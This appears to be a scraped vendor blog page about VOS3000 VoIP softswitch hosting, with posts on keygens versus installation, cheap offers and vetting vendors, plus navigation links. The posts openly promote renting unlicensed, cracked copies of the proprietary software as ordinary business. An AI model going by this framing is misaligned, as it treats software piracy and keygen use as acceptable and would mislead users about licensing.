7. outlook is not important for firewall the backend rules is most important here

VOS3000 Extended Firewall, VOS3000 Installation, VOS3000 Server, VOS3000 SoftSwitch, VOS3000 Switch, VOS3000, VOS3000 Pricem VOS3000 Web, VOS3000 API, VOS3000 Rent, VOS3000 Manual, VOS3000 Downloads, VOS3000 VoIP, VOS3000 Carrier Switch, VOS3000 Extended Firewall

visit https://www.vos3000.com for more info

VOS3000 Keygen vs Installation, Choose Best One!

May 27, 2019January 19, 2026 king

VOS3000 Keygen vs Installation, Choose Best One!

Hello all,

Many of people asked some people sell keygen+files and some sell installations. Thing is if you are a voip wholesaler why you need vos3000 keygen+files ? Don’t waste money, those people actually sell files+keygen they are seasonal businessman. They just simply scrap seller, they knows they can’t give future service, so they sell files and keygen. But if you are a voip wholesaler you don’t need to take extra headache. Everybody do his own work, if we want to do all then we have to be farmer, cloths maker, developer etc. But each people have their specialty on their work. So do not for keygen and be aware about keygen seller. They will never able to provide better service.

When you need service just take the installation and work accordingly. VOS3000 Versions will change again, then just try another one. Do not waste money with those stuffs.

Contact in whatsapp for more info : +8801911119966 (text only)

download all vos3000 user manuals for free from : https://www.vos3000.com

Thanks

VOS3000 VoIP Softswitch – Complete Guide, Features, Installation & Security

VOS3000 Installation Guide – Secure Setup, CentOS, Firewall & Best Practices

VOS3000 Softswitch Rent, Installation & Price – Dedicated and Cloud Server Solutions

VOS3000-Offer, VOS3000 Price, VOS3000 rent, VOS3000 Hosting, VOS3000 installation, VOS3000 CentOS, VOS3000 Hosted, VOS3000 21907, VOS3000 Web, VOS3000 Softswitch, VOS3000 Keygen, VOS3000 Login, VOS3000 API, VOS3000 Anti Hack

Cheapest VS Cheaper VOS3000!

May 27, 2019June 4, 2019 king

Hello all,

Sometime some people offer something which is almost unbelievable. Provide super offer. But there is always conditions!!! Or hidden things. Let me tell you a story:

In 2009/2010 i was working with one good softswitch brand as regional manager for asia. One reseller came for hosting solution and we gave monthly license offer for 100 usd month. After that he added dialer license from another company around 100 usd, his server cost/support etc is around 100 usd. Now his cost is 300 usd and he start selling it @ 99 usd full package!! Just think carefully: there is nobody here to do charity or give loss. Then what is his secret ? Later on we discovered he hacked 10 usd a day from each server and in voip its a very small amount, nobody even understand. So actually he is charging 400 usd overall! He hacked only 10 usd – so client can’t understand anything. He was almost top for hosted server with voip softswitch that time. So be realistic, don’t go for cheapest, try cheaper but not cheapest.

Many people offer 50/100 usd vos3000 installation with many offers. Be careful always, installing isn’t hard. Sometime even you can do that but solving future issues is not easy, so always spend little more and get quality solution. All price depends on the service, trust, quality, future requirements.

All golden colors product are not GOLD. VOS3000/Softswitch is the main thing which will help you to grow your business. You must choose things carefully here, because it will help you in many ways. You must need to feed your cow if you need Good Milk!!

Before Choosing Server/Softswitch Vendors. Must keep in mind…

May 27, 2019June 2, 2019 king

Hello all,

I am not professional writer, please ignore typos and grammatical mistakes.

Know your requirement first:

First of all you need to know what you need. If you are looking for softswitch then cheaper switch is vos3000 for small wholesaler. If you have better call volume and have good business then consider other carrier grade system. VOS3000 is only good for handle bulk calls, junk calls, cc calls.

Concurrency Requirements:

If VOS3000 is your choice then first be sure how much capacity server you need. VOS3000 use very small resource, so up-to 1000 calls its fine to use cloud server. Because it will be cheaper for you, many people go for dedicated server where they have only 100 concurrent calls, its actually waste of money. Unless you don’t use media proxy just simply use cheaper server.

Licensed VOS3000/Non Licensed:

Obviously 100% there is no alternative of license vos3000 which provide by linknat. If you can afford it obviously go for it. But remember they don’t have any hosted/rental offers. If you get anyone who offer licensed copy rent then it might be lie. Linknat only offer their system for sell and they do not sell older versions. Prices are depends on payment mode, it can be 10-16k usd depending on your bargain capacity. But their support is very poor.

For non Licensed vendor:

If you have lower budget and can not afford licensed, need local supports, don’t want to invest much in softswitch then you can go for non licensed vos3000. Now its most important is selecting vendors for your switch. Must need to follow those steps.
Double check from how long that company running and proving service. Do a small background check by checking their website and check which records.
Check if they have their real address and name listed in website or website whois records.
See if their whatsapp have their photos or not, try to get their other social ids.
Search their company name in google maps, some people add fake maps but still see if they have pictures on that maps or not. Simply try to gather as much information possible. Its for your safety, it seems funny but your switch will have all data and everything. So you need to know about it where you are keeping it.
If that person work from home or actually running office. If they provide better rates and work from home then go for it. When you will be in trouble you will never get them. Normally trouble not come but when you are paying why you don’t take from better place.
Now some people rent server even they don’t have a own website. Using gamil id, how one person don’t have even website ready which need 100 usd maximum. How they will give you support, be aware of those type single man show company.
Always don’t go for cheapest option, try cheaper but not cheapest. Your business will be better in future. Good stable company can help you in many other ways and you can learn a lot from them.
Fake names/identity hider/non company email ids/no website for company/no physical office/newly formed company/less experience or connections – avoid them.
2 years back in ITW i saw many people use similar company names, fake trade reference and finally they cheat with clients. So your small carefulness will help you to success in your business
Don’t only take reference from friends, sometime for sales commission friends suggest anyone where they have much margin. Google it whatever service you need then go for it.
Know configurations instead of concurrency, as people tell 2000,5000 cc but in same config. So proper judgement – always ask configuration they are providing and then compare.”
There are many more things need to follow, i will try to think more and will add in future blogs.

There are many people providing rental solution for vos3000 but try to take it from experts. It will be hell easy for you to run the show. Remember one thing: crack products is always free but you are paying for the service who si providing. There is no price for the products, service price obviously matter depending quality. Don’t be fool and buy product with high price for lower service.

VOS3000

MULTAHOST Blog for VOS3000 Troubleshoot

Tag: VOS3000 Gateway Management

HOW VOS3000 Get Hacked by SQL Injection Script, prevent Hacking!

Nasıl VOS3000 SQL Injection Script tarafından Hacked alın, Hacking önlemek!

Cómo VOS3000 Conseguir Hackeado por SQL Inyección Script, evitar la piratería!

कैसे VOS3000 SQL इंजेक्शन स्क्रिप्ट द्वारा काट दिया हो, हैकिंग को रोकने के!

VOS3000 2.1.7.01 Manual/Guide/Details in English

VOS3000 2.1.7.01 Manual/Guide/Details in English

VOS3000 2.1.4.0 Manual/Guide/Details

VOS3000 Web Management/Android/IOS Mobile Apps Developing API

VOS3000 2.1.6.0 Change logs/ Updates history by Developer Team

VOS3000 Extended Firewall for Secured Server

VOS3000 Extended Firewall for Secured Server

VOS3000 Keygen vs Installation, Choose Best One!

VOS3000 Keygen vs Installation, Choose Best One!

Cheapest VS Cheaper VOS3000!

Before Choosing Server/Softswitch Vendors. Must keep in mind…

Know your requirement first:

Concurrency Requirements:

Licensed VOS3000/Non Licensed:

For non Licensed vendor: